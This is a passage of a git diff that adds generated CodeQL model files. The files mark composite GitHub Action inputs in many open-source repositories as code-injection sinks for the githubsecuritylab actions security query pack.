ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/stellar_go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/subquery_subql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml new file mode 100644 index 00000000000..4bc9d5ed771 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml new file mode 100644 index 00000000000..3ce17568490 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml new file mode 100644 index 00000000000..80a23352e55 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml new file mode 100644 index 00000000000..441c8ebcd52 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml new file mode 100644 index 00000000000..d4e8a2c32bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml new file mode 100644 index 00000000000..ce3ed699b9a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml new file mode 100644 index 00000000000..8b62fe8e0aa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml new file mode 100644 index 00000000000..946faca35c9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml new file mode 100644 index 00000000000..b68c9462c1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml new file mode 100644 index 00000000000..aedefc9ee02 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml new file mode 100644 index 00000000000..36f7a18e198 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml new file mode 100644 index 00000000000..a1d324f44bd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml new file mode 100644 index 00000000000..53142801fec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml new file mode 100644 index 00000000000..5170beb3a7a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml new file mode 100644 index 00000000000..1fabdd9085b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml new file mode 100644 index 00000000000..370d3c6954e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml new file mode 100644 index 00000000000..ac0156b719f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml new file mode 100644 index 00000000000..9ee197ed884 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml new file mode 100644 index 00000000000..99a1e4cec71 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml new file mode 100644 index 00000000000..d2a6dbd4929 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml new file mode 100644 index 00000000000..13a9ff475b9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml new file mode 100644 index 00000000000..a173154bec0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml new file mode 100644 index 00000000000..f7a5017d2fb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml new file mode 100644 index 00000000000..1bcf118810f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml new file mode 100644 index 00000000000..fb210d5af55 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml new file mode 100644 index 00000000000..77554b9872e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml new file mode 100644 index 00000000000..7fc1eaaca48 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml new file mode 100644 index 00000000000..921095f8a38 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml new file mode 100644 index 00000000000..e8dba39c742 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml new file mode 100644 index 00000000000..69970d3419b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml new file mode 100644 index 00000000000..b57797cc643 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml new file mode 100644 index 00000000000..08b65cea6d7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml new file mode 100644 index 00000000000..453e60f3595 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml new file mode 100644 index 00000000000..012802b8006 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml new file mode 100644 index 00000000000..a397a77f6dc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml new file mode 100644 index 00000000000..15de610c981 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml new file mode 100644 index 00000000000..ad6e7e806cd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml new file mode 100644 index 00000000000..67631102d71 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml new file mode 100644 index 00000000000..098d7c139fa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml new file mode 100644 index 00000000000..def12e48741 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml new file mode 100644 index 00000000000..768db7317cc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml new file mode 100644 index 00000000000..55218009c02 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml new file mode 100644 index 00000000000..17ec5471e85 --- /dev/null +++ 